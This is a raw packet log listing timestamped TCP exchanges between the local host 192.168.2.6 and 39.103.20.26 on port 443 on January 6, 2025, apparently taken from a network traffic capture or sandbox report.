Jan 6, 2025 04:50:44.762070894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.762145996 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792188883 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792263031 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792273998 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792280912 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792380095 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792431116 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792438030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792438030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792438030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792447090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792490959 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792795897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792829037 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792850971 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792857885 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792882919 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792905092 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.792962074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.792998075 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793016911 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.793021917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793045044 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.793066025 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.793435097 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793481112 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793488026 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.793492079 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793529987 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.793735027 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.793790102 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.794893026 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.794945002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.798948050 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.799011946 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.801003933 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.801059008 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.805085897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.805165052 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.807137012 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.807193041 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.811234951 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.811292887 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.813297987 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.813355923 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.815433979 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.815507889 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.819442987 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.819503069 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.917618036 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.917877913 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.918463945 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.918525934 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.922338963 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.922401905 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.924194098 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.924252033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.926227093 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.926285028 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.930139065 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.930219889 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.931992054 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.932050943 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.935998917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.936055899 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.939364910 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.939421892 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.939846992 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.939902067 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.943758965 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.943835974 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.945739985 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.945797920 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.949647903 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.949702978 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.951637030 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.951692104 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.954037905 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.954112053 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.957297087 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.957356930 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.959258080 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.959330082 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.963217974 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.963279963 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.965313911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.965392113 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.969070911 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.969129086 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.971024990 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.971091032 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.972898960 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.972960949 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.976890087 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.976972103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.978728056 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.978785992 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.982599974 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.982662916 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.984607935 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.984659910 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.986521006 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.986578941 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.990396023 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.990462065 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.992397070 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.992463112 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.996220112 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.996277094 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:44.998215914 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:44.998295069 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.000086069 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.000147104 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.004241943 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.004301071 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.005778074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.005831957 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.009480000 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.009571075 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.011296988 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.011388063 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.014885902 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.014950037 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.016860008 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.016931057 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.018688917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.018748045 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.022696018 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.022747040 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.026077986 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.026154995 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.028635979 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.028700113 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.028709888 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.028717995 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.028747082 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.028772116 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.032531023 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.032593966 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.036425114 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.036457062 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.036487103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.036490917 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.036528111 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.036546946 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.040757895 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.040808916 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.040865898 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.040925026 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.043988943 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.044038057 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.049954891 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.050002098 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.050020933 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.050024986 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.050075054 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.053767920 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.053826094 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.053842068 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.053893089 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.059711933 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.059741974 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.059771061 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.059775114 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.059807062 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.059835911 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.063721895 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.063770056 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.063793898 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.063843966 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.069353104 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.069399118 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.069437027 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.069487095 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.075242043 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.075289965 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.075298071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.075340033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.081056118 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.081106901 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.081214905 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.081263065 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.108325958 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.108381033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.152090073 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.152184010 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.156012058 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.156045914 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.156168938 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.156168938 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.156174898 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.156219959 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.159796000 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.159859896 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.161941051 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.162003040 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.165220022 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.165278912 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.167331934 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.167375088 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.169457912 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.169511080 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.173727036 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.173777103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.175164938 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.175219059 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.179399014 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.179461002 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.180991888 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.181045055 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.184814930 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.184866905 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.186458111 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.186521053 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.188438892 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.188512087 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.192358971 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.192414999 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.194463015 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.194514990 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.198132038 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.198189020 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.199966908 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.200023890 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.200639009 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.200695038 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.202861071 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.202950001 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.204183102 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.204252958 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.206634998 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.206696033 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.207513094 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.207567930 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.209794998 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.209853888 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.210963011 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.211031914 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.212163925 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.212210894 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.214385986 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.214437962 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.215538025 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.215593100 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.217926979 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.217977047 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.219103098 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.219167948 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.220343113 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.220396042 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.237848043 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.237900019 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.240717888 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.240770102 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.240818977 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.240873098 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.246367931 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.246414900 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.246454000 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.246459961 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.246504068 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.251940012 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.252021074 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.252054930 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.252058983 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.252084017 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.252108097 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.257767916 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.257806063 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.257817030 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.257821083 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.257869959 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.261728048 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.261764050 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.261773109 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.261778116 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.261823893 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.267479897 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.267518044 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.267527103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.267533064 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.267576933 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.273123980 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.273169994 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.273181915 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.273186922 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.273224115 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.278995991 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.279063940 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.279076099 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.279081106 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.279827118 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.279827118 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.284887075 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.284940958 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.284955025 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.284965038 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.284993887 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.285017014 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.287302971 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.287353039 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.287403107 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.287456989 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.290893078 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.290925026 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.290951014 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.290956020 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.290987015 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.291007042 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.294214964 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.294275045 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.294318914 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.294378042 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.298988104 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.299021006 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.299052000 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.299056053 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.299115896 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.299139023 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.301220894 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.301266909 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.301275969 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.301281929 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.301314116 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.301340103 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.303354025 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.303416014 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.303459883 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.303513050 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.307089090 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.307128906 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.307156086 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.307159901 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.307197094 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.307215929 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.327574015 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.327636003 CET	49962	443	192.168.2.6	39.103.20.26
Jan 6, 2025 04:50:45.327688932 CET	443	49962	39.103.20.26	192.168.2.6
Jan 6, 2025 04:50:45.327742100 CET	49962	443	192.168.2.6	39.103.20.26
